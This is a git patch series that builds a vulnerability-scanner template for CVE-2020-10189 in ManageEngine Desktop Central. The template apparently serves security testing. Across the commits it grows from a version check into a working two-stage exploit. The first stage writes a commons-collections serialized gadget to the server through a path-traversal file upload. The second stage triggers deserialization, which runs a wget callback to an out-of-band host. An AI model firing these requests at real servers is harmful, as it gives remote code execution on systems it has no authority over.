From 8a5bde391ba78e579a08f85a5c4344d04ff94a47 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:15:38 -0500 Subject: [PATCH 1/8] Create CVE-2020-10189 template --- http/cves/2020/CVE-2020-10189.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2020/CVE-2020-10189.yaml diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml new file mode 100644 index 0000000000..3d97618a66 --- /dev/null +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-10189 + +info: + name: ManageEngine Desktop Central Java Deserialization + author: king-alexander + severity: critical + remediation: Apply updates per vendor instructions. + description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 + - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html + tags: cve,cve2020,kev + +http: + - method: GET + path: + - "https://{{Host}}:8383/configurations.do" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ManageEngine Desktop Central" + + - type: dsl + dsl: + - compare_versions(version, '<10.0.474') From a58c0036b9cf44ebe205a65f72fb1a9e9d56ed49 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:25:58 -0500 Subject: [PATCH 2/8] Fix trailing whitespace --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 3d97618a66..51eabfb486 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -4,7 +4,7 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. + remediation: Apply updates per vendor instructions. description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 From 4be597880b258112bac1eda90bc1b5c39fbee152 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 11:51:34 -0500 Subject: [PATCH 3/8] Add Stage 1 Stage 1 is the arbitrary file write. This code creates a new file on the Zoho ManageEngine server with our serialized exploit, which will be executed in the next stage. --- http/cves/2020/CVE-2020-10189.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 51eabfb486..6c034ee761 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -13,6 +13,7 @@ info: tags: cve,cve2020,kev http: + # detect vulnerable version - method: GET path: - "https://{{Host}}:8383/configurations.do" @@ -38,3 +39,17 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write + - method: POST + headers: + Content-Type: application/octet-stream + path: + # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename + - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" + # generate a serialized raw bytes payload + body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' + + matchers: + - type: status + status: + - 200 From 825b9fbed4d5b80e2adc3319f702ff41fec27b99 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:13:14 -0500 Subject: [PATCH 4/8] Add Stage 2 Stage 2 triggers the deserialization vulnerability in `getChartImage()`. --- http/cves/2020/CVE-2020-10189.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 6c034ee761..e40388c733 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -39,6 +39,7 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write - method: POST headers: @@ -53,3 +54,19 @@ http: - type: status status: - 200 + + # deserialization + - method: POST + path: + - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "http" From 7f80f000b4fda49adcca496e4e5216e0148a78d2 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:19:31 -0500 Subject: [PATCH 5/8] Update description --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index e40388c733..990833f69c 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -5,7 +5,7 @@ info: author: king-alexander severity: critical remediation: Apply updates per vendor instructions. - description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html From d3087ea35f3b961e77fca2291dafc0b3dce7fcab Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:22:39 -0500 Subject: [PATCH 6/8] Update references I referenced Packet Storm for the logic to detect vulnerable versions and Source Incite for the proof of concept. --- http/cves/2020/CVE-2020-10189.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 990833f69c..5c7e88c67e 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -9,6 +9,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://srcincite.io/pocs/src-2020-0011.py.txt - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html tags: cve,cve2020,kev From 0d6238b97ba1b914a4040c373d4315d0daf6c6a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 16:24:10 +0530 Subject: [PATCH 7/8] fix template --- http/cves/2020/CVE-2020-10189.yaml | 104 ++++++++++++++--------------- 1 file changed, 50 insertions(+), 54 deletions(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 5c7e88c67e..a6332680e6 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -4,70 +4,66 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. - description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + description: | + Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + remediation: | + Apply updates per vendor instructions. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html - - https://srcincite.io/pocs/src-2020-0011.py.txt + - https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189 - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html - tags: cve,cve2020,kev + - https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/ + - https://cwe.mitre.org/data/definitions/502.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-10189 + cwe-id: CWE-502 + epss-score: 0.97206 + epss-percentile: 0.99826 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_desktop_central + fofa-query: + - body="manageengine desktop central 10" + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" + shodan-query: http.title:"manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" + tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive + +flow: http(1) && http(2) http: - # detect vulnerable version - - method: GET - path: - - "https://{{Host}}:8383/configurations.do" + - raw: + - | + POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream - extractors: - - type: regex - name: version + {{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}} + + matchers: + - type: status + status: + - 200 internal: true - group: 1 - regex: - - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + - raw: + - | + POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ManageEngine Desktop Central" - - - type: dsl - dsl: - - compare_versions(version, '<10.0.474') - - # arbitrary file write - - method: POST - headers: - Content-Type: application/octet-stream - path: - # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename - - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" - # generate a serialized raw bytes payload - body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' - - matchers: - - type: status - status: - - 200 - - # deserialization - - method: POST - path: - - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: status + status: + - 200 From c7da7e51d00064323f7420d2f9d5acddf2f91690 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:55:16 +0530 Subject: [PATCH 8/8] update req --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index a6332680e6..39653c65ca 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -54,7 +54,7 @@ http: - raw: - | - POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + GET /cewolf/?img=%5Clogger.zip HTTP/1.1 Host: {{Hostname}} matchers-condition: and